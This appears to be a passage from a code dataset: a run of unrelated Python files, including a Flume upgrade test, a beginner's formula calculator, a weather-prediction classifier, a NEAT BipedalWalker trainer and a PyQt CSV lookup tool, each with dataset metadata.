(cls._agent1_chkpt_dir, cls._agent1_data_dir, cls._agent2_chkpt_dir, cls._agent2_data_dir):\n if os.path.exists(outdir):\n shutil.rmtree(outdir)\n if os.path.isfile(cls._data_file):\n os.remove(cls._data_file)\n if os.path.isfile(cls._data_stop):\n os.remove(cls._data_stop)\n\n @classmethod\n def verifyLongRunningJob(cls):\n '''\n Validate long running background job after end of all component upgrade\n '''\n from beaver.component.rollingupgrade.ruUpgrade import UpgradePerNode\n logger.info(\"Stop the Flume agents before verification\")\n open(cls._data_stop, 'a').close()\n time.sleep(60)\n agent1.stop()\n agent2.stop()\n time.sleep(60)\n logger.info(\"Verifying the sinked data from Flume agent\")\n exit_code, stdout, stderr = Hadoop.runas(\n cls._hdfs_user, \"dfs -cat %s/*\" % cls._hdfs_test_dir, logoutput=False, stderr_as_stdout=False\n )\n if exit_code != 0:\n logger.error(\"Following error during the HDFS cat while fetching Flume data: %s\" % stderr)\n if not util.compareOutputToFileIgnoreDupsAndOrder(stdout, cls._data_file):\n UpgradePerNode.reportProgress(\n \"[FAILED][FLUME][BGJob] Long running test for Flume failed while verifying data\"\n )\n else:\n UpgradePerNode.reportProgress(\n \"### [PASSED][FLUME][BGJob] Long running test validation for Flume passed ####\"\n )\n\n @classmethod\n def upgrade_master(cls, version, config=None):\n '''\n Upgrades Master services:\n :param version: Version to be upgraded to\n :param config: Config location\n '''\n cls.switch_master_version(version)\n\n @classmethod\n def switch_master_version(cls, version):\n '''\n Switches the Flume agent service\n :param version: Version to be switched to\n '''\n from beaver.component.rollingupgrade.ruCommon import hdpSelect\n logger.info(\"Stop the second Flume Agent before upgrade\")\n open(cls._data_stop, 'a').close()\n time.sleep(10)\n agent1.stop()\n time.sleep(3)\n os.remove(cls._data_stop)\n hdpSelect.changeVersion(\"flume-server\", version)\n logger.info(\"Restart the Flume agents with the new version\")\n addlParams = \"-Dflume.log.dir=%s -Dflume.log.file=agent.log\" % cls._local_work_dir\n agent1.start(\"agent\", cls._flume_test_src, addlParams=addlParams, enableDebugLogOnConsole=False)\n time.sleep(20)\n agent2.stop()\n time.sleep(10)\n addlParams = \"-Dflume.log.dir=%s -Dflume.log.file=agent2.log\" % cls._local_work_dir\n agent2.start(\"agent2\", cls._flume_test_src, addlParams=addlParams, enableDebugLogOnConsole=False)\n time.sleep(10)\n\n @classmethod\n def upgrade_slave(cls, version, node, config=None):\n '''\n Upgrades slave services :\n :param version: Version to be upgraded to\n :param node: Slave Node\n :param config: Config location\n :return:\n '''\n logger.info(\"*** No slave component in Flume, so nothing to upgrade ***\")\n\n @classmethod\n def downgrade_master(cls, version, config=None):\n '''\n Downgrade Master services\n :param version: Version to be downgraded to\n :param config: Configuration location\n '''\n cls.switch_master_version(version)\n\n @classmethod\n def downgrade_slave(cls, version, node, config=None):\n '''\n Downgrade slave services\n :param version: version to be downgraded to\n :param config: Configuration location\n '''\n logger.info(\"*** No slave component in Flume, so nothing to downgrade ***\")\n\n @classmethod\n def run_client_smoketest(cls, config=None, env=None):\n '''\n Run Smoke test after upgrading Client\n :param config: Configuration location\n :param env: Set Environment variables\n '''\n logger.info(\"TODO\")\n\n @classmethod\n def testAfterAllSlavesRestarted(cls):\n '''\n Function to test upgrade is done properly after all master and slaves are upgraded for Hdfs, yarn and Hbase\n :return:\n '''\n logger.info(\"Nothing to be done here for Flume\")\n","sub_path":"beaver/component/rollingupgrade/ruFlume.py","file_name":"ruFlume.py","file_ext":"py","file_size_in_byte":10090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"364429453","text":"''' Formula's Calculations using Functions '''\r\n\r\nprint(\"\\n\\t Formula's Calculations - Select Yours Operation\")\r\n\r\nprint(\"\\n\\t Press & Enter (A) - Average\")\r\n\r\nprint(\"\\n\\t Press & Enter (P) - Percentage\")\r\n\r\nprint(\"\\n\\t Press & Enter (MM) - Maximum & Minimum\")\r\n\r\nprint(\"\\n\\t Press & Enter (EO) - Even or Odd Number\")\r\n\r\nprint(\"\\n\\t Press & Enter (PC) - Prime or Consonant Number\")\r\n\r\nprint(\"\\n\\t Press & Enter (PN) - Positive or Negative\")\r\n\r\nprint(\"\\n\\tPress & Enter (SCFF) - Square, Cube, Fourth & Fivthpower\")\r\n\r\nprint(\"\\n\\t Press & Enter (ATCS) - Area of Triangle, Cricle & Sphere\")\r\n\r\nprint(\"\\n\\t Press & Enter (SDT) - Speed, Distance & Time\")\r\n\r\nprint(\"\\n\\n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\")\r\n\r\nwhile True:\r\n\r\n formulas = input(\"\\nFrom Above Statements - Provide a Number to Perform Calculation \\n\\nPress - ( A - P - MM - EO - PC - PN - SCFF - ATCS - SDT ) : \")\r\n\r\n formulas = formulas.upper()\r\n\r\n if formulas in ('A','P','MM','EO','PC','PN','SCFF','ATCS','SDT'):\r\n\r\n if formulas == 'A':\r\n\r\n ''' Average '''\r\n\r\n num = int(input(\"\\nProvide Number of Value's you want Calculate:\"))\r\n\r\n def avg():\r\n\r\n sum = 0\r\n\r\n for i in range(num):\r\n\r\n number = int(input(\"\\nDecide a Number : \"))\r\n\r\n sum = sum + number\r\n\r\n average = sum / num\r\n\r\n print(\"\\n\\tThe Average of Numbers will be\", round(average,2))\r\n\r\n avg()\r\n\r\n elif formulas == 'P':\r\n\r\n ''' Percentage '''\r\n\r\n num = int(input(\"\\nProvide Number of Value's you want Calculate:\"))\r\n\r\n def per():\r\n\r\n sum = 0\r\n\r\n for i in range(num):\r\n\r\n number = eval(input(\"\\nDecide a Number : \"))\r\n\r\n sum = sum + number\r\n\r\n percentage = sum / 100\r\n\r\n print(\"\\n\\tThe Percentage of Numbers will be\", round(percentage,2))\r\n\r\n per()\r\n\r\n elif formulas == 'MM':\r\n\r\n ''' Maximum & Minimum '''\r\n\r\n my_list = []\r\n\r\n num = int(input(\"\\nProvide Number of Value's you want Calculate:\"))\r\n\r\n def display():\r\n\r\n for i in range(num):\r\n\r\n numbers = int(input(\"\\nDecide a Number : \"))\r\n\r\n my_list.append(numbers)\r\n\r\n print(\"\\n\\tMaximum element in the list is :\", max(my_list), \"\\n\\n\\tMinimum element in the list is :\", min(my_list))\r\n\r\n display()\r\n\r\n elif formulas == 'EO':\r\n\r\n ''' Even or Odd '''\r\n\r\n num = int(input(\"\\nDecide a Number : \"))\r\n\r\n def display(num):\r\n\r\n if (num % 2 == 0):\r\n\r\n print(\"\\n\\t\",num, \"Is Even Number\")\r\n\r\n else:\r\n print(\"\\n\\t\",num, \"Is Odd Number\")\r\n\r\n display(num)\r\n\r\n elif formulas == 'PC':\r\n\r\n ''' Prime & Consonant Numbers '''\r\n\r\n def prime(num):\r\n\r\n if num > 1:\r\n\r\n for i in range(2, num):\r\n\r\n if (num % i) == 0:\r\n\r\n print(num, \"is not a Prime Number - Consonant Number\")\r\n\r\n break\r\n\r\n else:\r\n\r\n print(num, \"is a Prime Number - Not a Consonant Number\")\r\n else:\r\n\r\n print(num, \"is not a Prime Number - Consonant Number\")\r\n\r\n return \"\"\r\n\r\n number = int(input(\"\\n\\tProvide a Number to Check : \"))\r\n\r\n print()\r\n\r\n print(prime(number))\r\n\r\n elif formulas == 'PN':\r\n\r\n ''' Positive or Negative '''\r\n\r\n num = eval(input(\"\\nDecide a Number : \"))\r\n\r\n def integer():\r\n\r\n if num > 0:\r\n\r\n print(\"\\n\\t\",num, \"Is Positive Integer\")\r\n\r\n elif num == 0:\r\n\r\n print(\" Integer Is Neither Positive & Nor Negative - (ZERO)\")\r\n\r\n else:\r\n print(\"\\n\\t\",num, \"Is Negative Integer\")\r\n\r\n integer()\r\n\r\n elif formulas == 'SCFF':\r\n\r\n ''' Square, Cube, Fourthpower and Fifthpower '''\r\n\r\n def square(num):\r\n\r\n print(\"\\n\\tThe Square of Number will be \",num * num)\r\n\r\n return \"\"\r\n\r\n def cube(num):\r\n\r\n print(\"\\n\\tThe Cube of Number will be \",num * num * num)\r\n\r\n return \"\"\r\n\r\n def fourthpower(num):\r\n\r\n print(\"\\n\\tThe Fourth Power of Number will be \",num * num * num * num)\r\n\r\n return \"\"\r\n\r\n def fifthpower(num):\r\n\r\n print(\"\\n\\tThe Fifth Power of Number will be \",num * num * num * num * num)\r\n\r\n return \"\"\r\n\r\n ''' Function Calling / Execution - For Square, Cube, 4th & 5th Power '''\r\n\r\n print(\"\\n\\t Select Your Root to Perform. \\n\")\r\n\r\n print(\"\\n\\t Press S - For Square \\n\")\r\n\r\n print(\"\\n\\t Press C - For Cube \\n\")\r\n\r\n print(\"\\n\\t Press FOU - For Fourth Power \\n\")\r\n\r\n print(\"\\n\\t Press FIF - For Fifth Power \\n\\n\")\r\n\r\n while True:\r\n\r\n ''' Take input from the user '''\r\n\r\n formulas = input(\"Enter Your choice For Root - Press - ( S - C - FOU - FIF) : \")\r\n\r\n formulas = formulas.upper()\r\n\r\n ''' Check if choice is one of the four options '''\r\n\r\n if formulas in ('S', 'C', 'FOU', 'FIF'):\r\n\r\n num = int(input(\"\\nDecide a number for the selected root: \"))\r\n\r\n\r\n if formulas == 'S':\r\n\r\n print(square(num))\r\n\r\n elif formulas == 'C':\r\n\r\n print(cube(num))\r\n\r\n elif formulas == 'FOU':\r\n\r\n print(fourthpower(num))\r\n\r\n elif formulas == 'FIF':\r\n\r\n print(fifthpower(num))\r\n\r\n break\r\n\r\n else:\r\n print(\"Invalid Input\")\r\n\r\n elif formulas == 'ATCS':\r\n\r\n ''' Area of Triangle, Circle & Sphere '''\r\n\r\n def areaoftriangle():\r\n\r\n height = h = int(input(\"\\nDecide the Height of Triangle : \"))\r\n\r\n base = b = int(input(\"\\nDecide the Base of Triangle : \"))\r\n\r\n areaoftriangle = (height * base) / 2\r\n\r\n print(\"\\n\\tArea of Triangle = \", round(areaoftriangle, 2))\r\n\r\n return \"\"\r\n\r\n def areaofcircle():\r\n\r\n pi = 3.14\r\n\r\n radius = r = int(input(\"\\nDecide the Radius : \"))\r\n\r\n areaofcircle = pi * ( radius ** 2 )\r\n\r\n print(\"\\n\\tArea of Triangle = \", round(areaofcircle, 2))\r\n\r\n return \"\"\r\n\r\n def areaofsphere():\r\n\r\n pi = 3.14\r\n\r\n radius = r = int(input(\"\\nDecide the Radius : \"))\r\n\r\n areaofsphere = 4 * pi * (r ** 2)\r\n\r\n print(\"\\n\\tArea of Sphere = \", round(areaofsphere,2))\r\n\r\n return \"\"\r\n\r\n print(\"\\n\\t Select Your Choice to Calculate Area of Triangle, Circle or Sphere \\n\")\r\n\r\n print(\"\\n\\t Press & Enter (AT) - Area of Triangle \\n\")\r\n\r\n print(\"\\n\\t Press & Enter (AC) - Area of Circle \\n\")\r\n\r\n print(\"\\n\\t Press & Enter (AS) - Area of Sphere \\n\")\r\n\r\n while True:\r\n\r\n ''' Take input from the user '''\r\n\r\n formulas = input(\"Enter Your choice For Calculation - Press - ( AT - AC - AS ) : \")\r\n\r\n formulas = formulas.upper()\r\n\r\n ''' Check if choice to Calculate Speed, Time or Distance '''\r\n\r\n if formulas in ('AT', 'AC', 'AS'):\r\n\r\n if formulas == 'AT':\r\n\r\n print(areaoftriangle())\r\n\r\n elif formulas == 'AC':\r\n\r\n print(areaofcircle())\r\n\r\n elif formulas == 'AS':\r\n\r\n print(areaofsphere())\r\n\r\n break\r\n\r\n else:\r\n\r\n print(\"Invalid Input\")\r\n\r\n elif formulas == 'SDT':\r\n\r\n ''' Speed, Distance & Time '''\r\n\r\n def speed(distance, time):\r\n\r\n distance = int(input(\"\\nDecide the Distance (KM) - To Calculate Speed : \"))\r\n\r\n time = int(input(\"\\nDecide the Time (S) - To Calculate Speed : \"))\r\n\r\n speed = distance * time\r\n\r\n return speed\r\n\r\n\r\n def distance(speed, time):\r\n\r\n speed = int(input(\"\\nDecide the Speed (M/S) - To Calculate Distance : \"))\r\n\r\n time = int(input(\"\\nDecide the Time (S) - To Calculate Distance : \"))\r\n\r\n distance = speed / time\r\n\r\n return distance\r\n\r\n def time(speed, distance):\r\n\r\n speed = int(input(\"\\nDecide the Speed (M/S) - To Calculate Time : \"))\r\n\r\n distance = int(input(\"\\nDecide the Distance (KM)- To Calculate Time : \"))\r\n\r\n time = speed / distance\r\n\r\n return time\r\n\r\n print(\"\\n\\t Select Your Choice to Calculate Speed, Time or Distance \\n\")\r\n\r\n print(\"\\n\\t Press S - Speed (M/S) \\n\")\r\n\r\n print(\"\\n\\t Press D - Distance (KM) \\n\")\r\n\r\n print(\"\\n\\t Press T - Time (S) \\n\")\r\n\r\n while True:\r\n\r\n ''' Take input from the user '''\r\n\r\n formulas = input(\"Enter Your choice For Calculation - Press - ( S - D - T ) : \")\r\n\r\n ''' Check if choice to Calculate Speed, Time or Distance '''\r\n\r\n formulas = formulas.upper()\r\n\r\n if formulas in ('S', 'D', 'T'):\r\n\r\n if formulas == 'S':\r\n\r\n print(\"\\n\\tSpeed - According To - Given Distance & Time : \",speed(distance, time), end=' (Meter Per Second)')\r\n\r\n elif formulas == 'D':\r\n\r\n print(\"\\n\\tDistance - According To - Given Speed & Time : \",distance(speed, time), end=' (Kilometers)')\r\n\r\n elif formulas == 'T':\r\n\r\n print(\"\\n\\tTime - According To - Given Speed & Distance : \",time(speed, distance), end=' (Second)')\r\n\r\n break\r\n\r\n else:\r\n\r\n print(\"Invalid Input\")\r\n\r\n break\r\n\r\n else:\r\n\r\n print(\"Invalid Input\")","sub_path":"src/Formulas_Calculations.py","file_name":"Formulas_Calculations.py","file_ext":"py","file_size_in_byte":10544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195442936","text":"class A:\r\n\tdef __init__(self, name, age):\r\n\t\tself.__name = name\r\n\t\tself._age = age\r\n\r\n\tdef get_name(self):\r\n\t\tprint(self.__name)\r\n\r\n\tdef get_age(self):\r\n\t\tprint(self._age)\r\n\r\n\tdef __hell(self):\r\n\t\tprint(\"Welcome vt\")\r\n\r\na1 = A(\"Moshe\", 22)\r\na1.get_name()\r\n# a1.name = \"jdklafj\"\r\na1._A__name = \"fasjfkl\"\r\na1.get_name()\r\nprint(a1._age)\r\na1._age = 76\r\nprint(a1._age)\r\n\r\nprint(a1._A__name)\r\n\r\na1._A__hell()\r\n\r\ndef greet(name = None):\r\n if name:\r\n return \"Hello {}\".format(name)\r\n return \"Hello\"\r\n \r\n \r\nprint(greet())\r\nprint(greet(\"vinay\"))","sub_path":"backup files/encap.py","file_name":"encap.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28744196","text":"#!/usr/bin/env python\n\"\"\"\ninfo about project here\n\"\"\"\n\nimport os\nimport time\n\n\n\n...\n\n__author__ = \"Johannes Coolen\"\n__email__ = \"johannes.coolen@student.kdg.be\"\n__status__ = \"development\"\n\n\ndef main():\n unumber = os.getuid()\n pnumber = os.getpid()\n where = os.getcwd()\n what = os.uname()\n used = os.times()\n now = time.time()\n means = time.ctime(now)\n\n print(\"User number\", unumber)\n print(\"Process ID\", pnumber)\n print(\"Current Directory\", where)\n print(\"System information\", what)\n print(\"System information\", used)\n\n\nif __name__ == '__main__': # code to execute if called from command-line\n main()\n","sub_path":"systeminfo.py","file_name":"systeminfo.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"87918193","text":"\"\"\"\nTests for the from_file function of the Cloudvomation class.\n\"\"\"\n\nimport os\nimport unittest\n\nfrom cloudvomation import Cloudvomation\n\n\nclass FromFileTestCase(unittest.TestCase):\n \"\"\" Tests for the from_file function. \"\"\"\n\n @classmethod\n def setUpClass(cls):\n this_path = os.path.dirname(os.path.abspath(__file__))\n template_path = os.path.join(this_path,\n 'test_template.yaml')\n\n if not os.path.exists(template_path):\n raise Exception('{} does not exist.'.format(template_path))\n\n cls.cv = Cloudvomation.from_file(region='eu-west-2',\n stack_name='my-stack-name',\n template_filename=template_path)\n\n def test_region(self):\n \"\"\" Assert that the internal _region member is set. \"\"\"\n self.assertEqual(self.cv._region, # pylint: disable=protected-access\n 'eu-west-2')\n\n def test_stack_name(self):\n \"\"\" Assert that the internal _stack_name member is set. \"\"\"\n self.assertEqual(self.cv._stack_name, # pylint: disable=protected-access\n 'my-stack-name')\n\n def test_template_body(self):\n \"\"\" Assert that the internal _template_body member is set. \"\"\"\n expected = 'AWSTemplateFormatVersion: 2010-09-09\\nDescription: Test\\n'\n self.assertEqual(self.cv._template_body, # pylint: disable=protected-access\n expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"cloudvomation/classes/test_cloudvomation/test_from_file.py","file_name":"test_from_file.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"410573667","text":"# parsing JSON from a file\n\nimport json\n\n# 1. Open the file\nwith open(\"code/Data/test.json\") as f:\n # 2. Parse JSON\n data = json.loads(f.read())\n\n# what is the fourth letter?\nprint(data[\"letters\"][3])\n\n# Output:\n# d\n","sub_path":"code/117.py","file_name":"117.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"111069728","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as plt\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import LabelEncoder\nheader = ['Date', 'Location', 'MinTemp', 'MaxTemp', 'Rainfall', 'Evaporation', 'Sunshine', 'WindGustDir','WindGustSpeed',\n 'WindDir9am', 'WindDir3pm', 'WindSpeed9am', 'WindSpeed3pm', 'Humidity9am', 'Humidity3pm',\n 'Pressure9am', 'Pressure3pm', 'Cloud9am', 'Cloud3pm', 'Temp9am', 'Temp3pm',\n 'RainToday', 'RISK_MM', 'RainTomorrow']\ndef get_score(file_path):\n df=pd.read_csv(file_path, names=header)\n data=df.drop(['Evaporation','Sunshine'], axis=1)\n le=LabelEncoder()\n data['WindDir3pm']=le.fit_transform(data['WindDir3pm'].fillna('0'))\n data['RainToday']=le.fit_transform(data['RainToday'].fillna('0'))\n data['RainTomorrow']=le.fit_transform(data['RainTomorrow'].fillna('0'))\n data['Location']=le.fit_transform(data['Location'].fillna('0'))\n data['WindGustDir']=le.fit_transform(data['WindGustDir'].fillna('0'))\n data['WindDir9am']=le.fit_transform(data['WindDir9am'].fillna('0'))\n X=data.iloc[:,1:22].values\n X = np.nan_to_num(X)\n Y=data['RainTomorrow'].values\n Y = np.nan_to_num(Y)\n X_train,X_test,y_train,y_test=train_test_split(X,Y)\n classifier=LogisticRegression(solver='lbfgs')\n classifier.fit(X_train,y_train)\n result = classifier.score(X_test,y_test)\n return result\ndef format_results(results):\n f = open('output\\\\result.txt', 'w')\n for country in results:\n output_format = \"[\" + country + \"] : [\" + str(results[country]) + \"]\\n\"\n f.write(output_format)\n avg = sum(results.values())/len(results)\n f.write(\"average_accuracy: [\" + str(avg) + \"]\")\n f.close()\nif __name__ == \"__main__\":\n path = \"data\"\n files = os.listdir(path)\n d = {}\n for file_ in files:\n file_path = os.path.join(path, file_)\n country = file_.split(\"_\")[-1][:-4]\n d[country] = get_score(file_path)\n print(\"Accuracy of {} is {}\".format(country, d[country]))\n format_results(d)\n","sub_path":"Task2/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"319605603","text":"from __future__ import print_function\nimport os\nimport neat\nimport visualize\nimport gym\nimport numpy as np\nfrom gym import wrappers\nimport pickle\n\nMAX_STEPS = 500\ncount = 0\nreward_list = []\n#env = wrappers.Monitor(env, '/mnt/c/Users/bc/Documents/EA/neat/cartpole/movies', video_callable=(lambda ep: ep % 150 == 0), force=True)\ndef eval_genomes(genomes, config):\n global env\n global MAX_STEPS\n global count\n env = gym.make(\"BipedalWalker-v2\")\n max_episode_fitness = -500\n for genome_id, genome in genomes:\n genome.fitness = 0\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n observation = env.reset()\n episode_reward = 0\n for _ in range(5):\n while True:\n action = net.activate(observation)\n #print(\"observation\",observation)\n #print(\"action\",action)\n action = np.clip(action,-1,1)\n #env.render()\n observation,reward,done,info = env.step(action)\n episode_reward += reward\n #if (-4.8 > observation[0]) or (observation[0] > 4.8) or (0.017453292519943 < observation[3] < -0.017453292519943) or (episode_reward >= MAX_STEPS):\n if done:\n #print(episode_reward)\n env.reset()\n break\n #print(episode_reward)\n genome.fitness = episode_reward / 5\n if max_episode_fitness <= episode_reward / 5 :\n max_episode_fitness = episode_reward / 5 \n winner = genome\n #print(max_episode_fitness)\n reward_list.append(episode_reward / 5)\n if count % 10 == 0:\n winner_net = neat.nn.FeedForwardNetwork.create(genome, config)\n #env = wrappers.Monitor(env, '/home/bc/Documents/EA/experiment/Bipedalwalker/neat/movies', force=True)\n #observation = env.reset()\n #for i in range(500):\n #action = winner_net.activate(observation)\n #env.render()\n #action = np.clip(action,-1,1)\n #observation,reward,done,info = env.step(action)\n #episode_reward += reward\n #if (-4.8 > observation[0]) or (observation[0] > 4.8) or (0.017453292519943 < observation[3] < -0.017453292519943) or (episode_reward >= MAX_STEPS):\n #if done:\n #observation = env.reset()\n #break\n\n for n, g in enumerate([winner]):\n name = '2winner-{0}'.format(n)\n with open(name+'.pickle', 'wb') as f:\n pickle.dump(g, f)\n\n visualize.draw_net(config, g, view=False, filename=str(count)+name + \"-net.gv\")\n visualize.draw_net(config, g, view=False, filename=str(count)+\"2net-enabled.gv\",show_disabled=False)\n count +=1\n\ndef run(config_file):\n global env\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Create the population, which is the top-level object for a NEAT run.\n p = neat.Population(config)\n #p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-9')\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(10))\n reward_list = []\n #for j in range(20):\n # Run for up to 300 generations.\n winner = p.run(eval_genomes, 300)\n print(reward_list)\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n print('\\nOutput:')\n\n visualize.draw_net(config, winner, True)\n visualize.plot_stats(stats, ylog=False, view=True)\n visualize.plot_species(stats, view=True)\n visualize.draw_net(config,winner,view=True,filename=\"winner-feedforward-evabled-pruneg.gv\",show_disabled=False,prune_unused=True)\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n final_reward = 0\n #env = wrappers.Monitor(env, '/mnt/c/Users/bc/Documents/EA/neat/BipedalWalker/movies', force=True)\n observation = env.reset()\n while True:\n action = winner_net.activate(observation)\n action = np.clip(action,-1,1)\n observation,reward,done,info = env.step(action)\n final_reward += reward\n if done:\n print(\"final_reward :\",final_reward)\n break\n #winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n for n, g in enumerate([winner]):\n visualize.draw_net(config, g, view=False, filename=str(j)+\"-net-enabled-pruned.gv\",show_disabled=False, prune_unused=True)\n #p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-4')\n #p.run(eval_genomes, 10)\n\nif __name__ == '__main__':\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-Feedforward')\n run(config_path)\n","sub_path":"experiment/Bipedalwalker/neat/temp/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"133532796","text":"#coding=utf-8\n\n\n#解释算法的复杂度\n#仅需要遍历一次链表,算法的复杂度为O(n)\n#去掉末尾\ndef combine(a, b):\n if a is None:\n return b\n if b is None:\n return a\n listA = list(a)\n listB = list(b)\n while len(listA)>0 and len(listB)>0:\n if listA[len(listA)-1] == listB[0]:\n listA.pop(len(listA)-1)\n listB.pop(0)\n else:\n break\n listA.extend(listB) #合并list\n return \"\".join(listA)\n\nif __name__==\"__main__\":\n print(combine(\"abcdef\", \"fedha\"))\n","sub_path":"naturali/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"177386012","text":"import csv\r\nimport logging\r\n\r\nfrom PyQt4 import QtGui, QtCore\r\n\r\nfrom functions import lookup_hts, lookup_model, log_debug_data, send_email\r\nfrom models import LookupModel\r\n\r\nlogging.basicConfig(filename='basic.log', level=logging.WARNING)\r\n\r\n\r\nclass OpenFile(QtGui.QWidget):\r\n def __init__(self, parent=None):\r\n super(OpenFile, self).__init__()\r\n self.layout = QtGui.QGridLayout()\r\n self.setLayout(self.layout)\r\n self.textEdit = QtGui.QTextEdit()\r\n self.textEdit.setReadOnly(True)\r\n self.layout.addWidget(self.textEdit, 1, 0, 3, 4)\r\n self.button_open = QtGui.QPushButton(\"Open File\")\r\n self.button_start = QtGui.QPushButton(\"Run Query\")\r\n self.button_save = QtGui.QPushButton(\"Save File\")\r\n self.button_open.clicked.connect(self.open_file)\r\n self.button_start.clicked.connect(self.on_start)\r\n self.button_save.clicked.connect(self.save_file)\r\n self.layout.addWidget(self.button_open, 4, 0, 1, 1)\r\n self.layout.addWidget(self.button_start, 4, 1, 1, 1)\r\n self.layout.addWidget(self.button_save, 4, 3, 1, 1)\r\n self.progress = QtGui.QProgressBar()\r\n self.progress.setRange(0, 1)\r\n self.layout.addWidget(self.progress, 5, 0, 1, 4)\r\n self.file_name = None\r\n self.output = []\r\n\r\n def open_file(self):\r\n try:\r\n self.file_name = QtGui.QFileDialog.getOpenFileName(self, 'Open file', '/home', '*.csv')\r\n except OSError as err:\r\n QtGui.QMessageBox.information(self, \"Information\", \"No file was chosen\")\r\n log_debug_data('OpenFile', 'open_file', err)\r\n except UnicodeDecodeError as err:\r\n QtGui.QMessageBox.information(self, \"Information\", \"File not supported\")\r\n log_debug_data('OpenFile', 'open_file', err)\r\n send_email(err)\r\n except PermissionError as err:\r\n QtGui.QMessageBox.infromation(self, \"Information\", \"Please close the file first.\")\r\n log_debug_data('OpenFile', 'save_file', err)\r\n else:\r\n with open(self.file_name, 'r', newline='', encoding='utf8', errors=\"ignore\") as f:\r\n data = f.read()\r\n self.textEdit.setText(data)\r\n\r\n def on_start(self):\r\n self.progress.setRange(0, 0)\r\n self.task = OpenFileThread(self.file_name)\r\n self.connect(self.task, QtCore.SIGNAL('on_finished(PyQt_PyObject)'), self.on_finished)\r\n self.connect(self.task, QtCore.SIGNAL('finished()'), self.done)\r\n self.task.start()\r\n\r\n def on_finished(self, output):\r\n self.output = output\r\n self.textEdit.setPlainText(str(self.output))\r\n self.progress.setRange(0, 1)\r\n self.progress.setValue(1)\r\n\r\n def save_file(self):\r\n print(\"Save file\")\r\n try:\r\n file = QtGui.QFileDialog.getSaveFileName(self, \"saveFlle\", \"Result.csv\", filter=\"csv (*.csv *.)\")\r\n except UnicodeDecodeError as err:\r\n QtGui.QMessageBox.infromation(self, \"Information\", \"Decoding Error.\")\r\n log_debug_data('OpenFile', 'save_file', err)\r\n send_email(err)\r\n except OSError as err:\r\n QtGui.QMessageBox.infromation(self, \"Information\", \"Please select a file to save.\")\r\n log_debug_data('OpenFile', 'save_file', err)\r\n except PermissionError as err:\r\n QtGui.QMessageBox.infromation(self, \"Information\", \"Please close the file first.\")\r\n log_debug_data('OpenFile', 'save_file', err)\r\n else:\r\n with open(file, 'w', newline='', encoding='utf8', errors=\"ignore\") as f:\r\n writer = csv.writer(f, delimiter=\";\")\r\n writer.writerows(self.output)\r\n\r\n def done(self):\r\n QtGui.QMessageBox.information(self, \"Done!\", \"Database searched!\")\r\n\r\n\r\nclass OpenFileThread(QtCore.QThread):\r\n def __init__(self, file: object) -> object:\r\n QtCore.QThread.__init__(self)\r\n self.file_name = file\r\n self.output = []\r\n\r\n def run_file(self):\r\n try:\r\n with open(self.file_name, encoding='utf8', errors='ignore') as f:\r\n fieldnames = ['SAP code', 'INVOICE #', 'SUPPLIER NAME', 'CoD', 'PART#', 'PART DESC', 'HTS #']\r\n reader = csv.DictReader(f, fieldnames=fieldnames, delimiter=';')\r\n for row in reader:\r\n if LookupModel.select().where(LookupModel.suplier_name == row['SUPPLIER NAME'].upper(),\r\n LookupModel.hts == lookup_hts(row['PART DESC'])).exists():\r\n self.output.append([row['SUPPLIER NAME'].upper(), row['PART DESC'],\r\n lookup_model(row['PART DESC'].upper()),\r\n lookup_hts(row['PART DESC'].upper())])\r\n\r\n else:\r\n self.output.append([row['SUPPLIER NAME'], row['PART DESC'], \"No Match Found\"])\r\n\r\n except UnicodeDecodeError as err:\r\n self.output = \"Decoding Error\"\r\n log_debug_data('OpenFileThread', 'run_file', err)\r\n send_email(err)\r\n\r\n def run(self):\r\n self.run_file()\r\n self.emit(QtCore.SIGNAL('on_finished(PyQt_PyObject)'), self.output)\r\n","sub_path":"interface_001.py","file_name":"interface_001.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530058157","text":"import sqlite3\n\n''' Управление транзакциями '''\n\ndb_filename = 'database.db'\n\ndef display_table(conn):\n cursor = conn.cursor()\n cursor.execute('select name, size, date from images;')\n for name, size, date in cursor.fetchall():\n print(name, size, date)\n\n\nwith 